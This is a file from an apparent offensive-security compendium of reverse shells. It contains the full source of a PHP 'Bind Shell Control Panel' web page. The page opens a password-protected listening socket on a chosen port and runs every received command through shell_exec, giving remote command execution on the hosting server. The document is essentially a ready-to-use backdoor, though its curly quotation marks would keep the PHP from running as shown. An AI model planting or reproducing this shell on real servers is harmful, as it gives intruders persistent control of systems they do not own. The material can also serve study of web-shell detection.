killchain-compendium/reverse shells/php_bind_shell

139 lines
3.0 KiB
Plaintext
Raw Normal View History

2021-08-23 01:13:54 +02:00
<?php
/*********************
@@author : lionaneesh
@@facebook : facebook.com/lionaneesh
@@Email : lionaneesh@gmail.com
********************/
?>
<html>
<head>
<title>Bind Shell — PHP</title>
</head>
<body>
<h1>Welcome to Bind Shell Control Panel </h1>
<p> Fill in the form Below to Start the Bind Shell Service </p>
<?php
if( isset($_GET[port]) &&
isset($_GET[passwd]) &&
$_GET[port] != “” &&
$_GET[passwd] != “”
)
{
$address = 127.0.0.1; // As its a bind shell it will always host on the local machine
// Set the ip and port we will listen on
$port = $_GET[port];
$pass = $_GET[passwd];
// Set time limit to indefinite execution
set_time_limit (0);
if(function_exists(“socket_create”))
{
// Create a TCP Stream socket
$sockfd = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
// Bind the socket to an address/port
if(socket_bind($sockfd, $address, $port) == FALSE)
{
echo “Cant Bind to the specified port and address!”;
}
// Start listening for connections
socket_listen($sockfd,15);
$passwordPrompt =
“\n=================================================================\n
PHP Bind Shell\n
\n
@@author : lionaneesh\n
@@facebook : facebook.com/lionaneesh\n
@@Email : lionaneesh@gmail.com\n
\n
=================================================================\n\n
Please Enter Password : “;
/* Accept incoming requests and handle them as child processes */
$client = socket_accept($sockfd);
socket_write($client , $passwordPrompt);
// Read the pass from the client
$input = socket_read($client, strlen($pass) + 2); // +2 for \r\n
if(trim($input) == $pass)
{
socket_write($client , “\n\n”);
socket_write($client , shell_exec(“date /t & time /t”) . “\n” . shell_exec(“ver”) . shell_exec(“date”) . “\n” . shell_exec(“uname -a”));
socket_write($client , “\n\n”);
while(1)
{
// Print Command prompt
$commandPrompt =”(Bind-Shell)[$]> “;
$maxCmdLen = 31337;
socket_write($client,$commandPrompt);
$cmd = socket_read($client,$maxCmdLen);
if($cmd == FALSE)
{
echo “The client Closed the conection!”;
break;
}
socket_write($client , shell_exec($cmd));
}
}
else
{
echo “Wrong Password!”;
socket_write($client, “Wrong Password , Please try again \n\n”);
}
socket_shutdown($client, 2);
socket_close($socket);
}
else
{
echo “Socket Conections not Allowed/Supported by the server! <br />”;
}
}
else
{
?>
<table align=”center” >
<form method=”GET”>
<td>
<table style=”border-spacing: 6px;”>
<tr>
<td>Port</td>
<td>
<input style=”width: 200px;” name=”port” value=”31337″ />
</td>
</tr>
<tr>
<td>Passwd </td>
<td><input style=”width: 100px;” name=”passwd” size=5 value=”lionaneesh”/>
</tr>
<tr>
<td>
<input style=”width: 90px;” class=”own” type=”submit” value=”Bind :D!”/>
</td>
</tr>
</table>
</td>
</form>
</tr>
</table>
<p align=”center” style=”color: red;” >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p>
<?php
}
?>